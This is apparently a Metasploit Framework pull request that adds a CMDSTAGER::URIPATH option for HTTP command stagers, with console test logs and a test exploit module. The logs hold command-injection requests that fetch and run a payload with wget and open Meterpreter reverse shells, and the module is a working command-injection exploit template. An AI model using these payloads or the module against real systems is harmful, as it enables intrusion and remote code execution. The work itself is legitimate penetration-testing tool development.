### PR TITLE
Exploit::CmdStager: Expose CMDSTAGER::URIPATH option for HTTP stagers

### DIFF
--- a/lib/msf/core/exploit/cmd_stager.rb
+++ b/lib/msf/core/exploit/cmd_stager.rb
@@ -67,6 +67,7 @@ module Exploit::CmdStager
         OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
         OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.']),
         OptString.new('CMDSTAGER::TEMP', [false, 'Writable directory for staged files']),
+        OptString.new('CMDSTAGER::URIPATH', [false, 'Payload URI path for supported stagers']),
         OptBool.new('CMDSTAGER::SSL', [false, 'Use SSL/TLS for supported stagers', false])
       ], self.class)
   end
@@ -147,6 +148,7 @@ module Exploit::CmdStager
 
     if stager_instance.respond_to?(:http?) && stager_instance.http?
       opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
+      opts['Path'] = datastore['CMDSTAGER::URIPATH'] unless datastore['CMDSTAGER::URIPATH'].blank?
       opts[:payload_uri] = start_service(opts)
     end
 


### PR DESCRIPTION
HTTP command stagers utilise Metasploit's `Exploit::Remote::HttpServer` HTTP server.

The server exposes a `URIPATH` datastore option which allows users to specify the URI path route to be handled by `on_request_uri`. As such, this option can also be used by HTTP command stagers when choosing where to host the payload.

Using `URIPATH` for command stagers is not intuitive as command stager options are usually prefixed with `CMDSTAGER::`. I would also not be surprised if this was unintended. A user who explicitly set the `URIPATH` when starting and configuring a server, then used a module which utilised a command stager, would probably not expect the `URIPATH` option to still apply (note: this PR does not change/fix this behaviour either).

Last time I wanted to control the path, I had to dig into the source and reverse engineer the HTTP server initialization and associated URL route handling to determine whether it was even possible to control the payload path from within `msfconsole`. `URIPATH` did not show up in `show options` or `show advanced` and feels like old unintuitive forgotten knowledge.

```
msf6 exploit(unix/webapp/test) > grep -i "uri" show advanced
   URIHOST                                                                no        Host to use in URI (useful for tunnels)
   URIPORT                                                                no        Port to use in URI (useful for tunnels)
msf6 exploit(unix/webapp/test) > grep -i "path" show advanced
   EXE::Path                                                              no        The directory in which to look for the executable template
   HttpRawHeaders                                                         no        Path to ERB-templatized raw headers to append to existing headers
   MSI::Path                                                              no        The directory in which to look for the msi template
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
msf6 exploit(unix/webapp/test) > 
```

The existing logic in the HTTP server checks if a `Path` key was provided in the initialization options, and if so, uses this option for the path (rather than a randomly generated string).

https://github.com/rapid7/metasploit-framework/blob/911092007c3d3d3341fbd6d6b8c9fa156f8189a3/lib/msf/core/exploit/remote/http_server.rb#L140-L150

https://github.com/rapid7/metasploit-framework/blob/911092007c3d3d3341fbd6d6b8c9fa156f8189a3/lib/msf/core/exploit/remote/http_server.rb#L644-L651

This PR adds a `CMDSTAGER::URIPATH` option for HTTP stagers, which intuitively uses the traditional `CMDSTAGER::` prefix, and passes this in the `Path` options Hash to the server initialization.

# Output

A few tests against the sample [Vulnerability Test Case](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers#the-vulnerability-test-case) for command stagers.

Note that this PR preserves existing behaviour. `CMDSTAGER::URIPATH` will take precedence over `URIPATH` if set. If `CMDSTAGER::URIPATH` is not set, `URIPATH` is used in line with existing behaviour.

```
                                                  
        +-------------------------------------------------+
        |               _                                 |
        |              /  \                               |
        |             /|oo \        M E T A S P L O I T   |
        |            (_|  /_)                             |
        |             _`@/_ \    _    F R A M E W O R K   |
        |            |     | \   \\                       |
        |            | (*) |  \   ))    Boston, MA, USA   |
        |   ______   |__U__| /  \//                       |
        |  / FIDO \   _//|| _\   /   FidoNet 1:617/1337   |
        | (________) (_/(_|(____/                         |
        |                  (jm)                           |
        +-------------------------------------------------+


       =[ metasploit v6.2.5-dev-911092007c                ]
+ -- --=[ 2249 exploits - 1176 auxiliary - 399 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Display the Framework log using the 
log command, learn more with help log

msf6 > use exploit/unix/webapp/test
[*] Using configured payload cmd/unix/reverse
msf6 exploit(unix/webapp/test) > set rhosts 192.168.200.130
rhosts => 192.168.200.130
msf6 exploit(unix/webapp/test) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(unix/webapp/test) > set target 1
target => 1
msf6 exploit(unix/webapp/test) > set payload
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/test) > set cmdstager::flavor wget
cmdstager::flavor => wget
msf6 exploit(unix/webapp/test) > set httptrace true
httptrace => true
msf6 exploit(unix/webapp/test) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://192.168.200.130:8080/54I5X27Aw
####################
# Request:
####################
GET /stage.php?ip=%3b%20wget%20-qO%20/tmp/JFHZeoGJ%20http%3a//192.168.200.130%3a8080/54I5X27Aw%3bchmod%20%2bx%20/tmp/JFHZeoGJ%3b/tmp/JFHZeoGJ%3brm%20-f%20/tmp/JFHZeoGJ HTTP/1.1
Host: 192.168.200.130
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0


[*] Client 192.168.200.130 (Wget/1.21.3) requested /54I5X27Aw
[*] Sending payload to 192.168.200.130 (Wget/1.21.3)
[*] Sending stage (989032 bytes) to 192.168.200.130
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.130:41982) at 2022-06-25 09:24:34 -0400
####################
# Response:
####################
No response received
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.200.130 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(unix/webapp/test) > set cmdstager::uripath /test
cmdstager::uripath => /test
msf6 exploit(unix/webapp/test) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://192.168.200.130:8080/test
####################
# Request:
####################
GET /stage.php?ip=%3b%20wget%20-qO%20/tmp/UxYVTJVT%20http%3a//192.168.200.130%3a8080/test%3bchmod%20%2bx%20/tmp/UxYVTJVT%3b/tmp/UxYVTJVT%3brm%20-f%20/tmp/UxYVTJVT HTTP/1.1
Host: 192.168.200.130
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0


[*] Client 192.168.200.130 (Wget/1.21.3) requested /test
[*] Sending payload to 192.168.200.130 (Wget/1.21.3)
[*] Sending stage (989032 bytes) to 192.168.200.130
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.130:41984) at 2022-06-25 09:24:56 -0400
####################
# Response:
####################
No response received
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.200.130 - Meterpreter session 2 closed.  Reason: Died

[*] 192.168.200.130 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(unix/webapp/test) > set URIPATH /not-test
URIPATH => /not-test
msf6 exploit(unix/webapp/test) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://192.168.200.130:8080/test
####################
# Request:
####################
GET /stage.php?ip=%3b%20wget%20-qO%20/tmp/zDenVoGQ%20http%3a//192.168.200.130%3a8080/test%3bchmod%20%2bx%20/tmp/zDenVoGQ%3b/tmp/zDenVoGQ%3brm%20-f%20/tmp/zDenVoGQ HTTP/1.1
Host: 192.168.200.130
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0


[*] Client 192.168.200.130 (Wget/1.21.3) requested /test
[*] Sending payload to 192.168.200.130 (Wget/1.21.3)
[*] Sending stage (989032 bytes) to 192.168.200.130
[*] Meterpreter session 3 opened (192.168.200.130:4444 -> 192.168.200.130:41986) at 2022-06-25 09:25:16 -0400
####################
# Response:
####################
No response received
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.200.130 - Meterpreter session 3 closed.  Reason: Died
msf6 exploit(unix/webapp/test) > unset cmdstager::uripath
Unsetting cmdstager::uripath...
msf6 exploit(unix/webapp/test) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://192.168.200.130:8080/not-test
####################
# Request:
####################
GET /stage.php?ip=%3b%20wget%20-qO%20/tmp/iLfaCFYw%20http%3a//192.168.200.130%3a8080/not-test%3bchmod%20%2bx%20/tmp/iLfaCFYw%3b/tmp/iLfaCFYw%3brm%20-f%20/tmp/iLfaCFYw HTTP/1.1
Host: 192.168.200.130
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0


[*] Client 192.168.200.130 (Wget/1.21.3) requested /not-test
[*] Sending payload to 192.168.200.130 (Wget/1.21.3)
[*] Sending stage (989032 bytes) to 192.168.200.130
[*] Meterpreter session 4 opened (192.168.200.130:4444 -> 192.168.200.130:41988) at 2022-06-25 09:31:09 -0400
####################
# Response:
####################
No response received
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.200.130 - Meterpreter session 4 closed.  Reason: Died
msf6 exploit(unix/webapp/test) > 
```

Test module;

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'test',
      'Description'     => %q{
        test
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'test'
        ],
      'References'      =>
        [
        ],
      'Platform'        => %w[unix linux],
      'Arch'            => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Payload'         => {'BadChars' => "\x00\x0a\x0d\x27\x5c"},
      'Targets'         =>
        [
          ['Automatic (Unix In-Memory)',
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
            'Type'           => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
            'Platform'       => 'linux',
            'Arch'           => [ARCH_X86, ARCH_X64],
            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
            'Type'           => :linux_dropper
          ]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => '2019-06-06',
      'DefaultTarget'   => 0))
    register_options [
      OptString.new('TARGETURI', [true, 'The base path to test', '/']),
    ]
  end

  def check
    CheckCode::Detected
  end

  def execute_command(cmd, opts = {})
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'stage.php'),
      'vars_get' => {'ip' => "; #{cmd}" }
    }, 5)

    unless res
      return if session_created?
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
    end

    res
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(
        noproto: true,
        linemax: 1_500,
        background: true
      )
    end
  end
end
```

Also paging @wvu in case you're still watching command stager related changes.
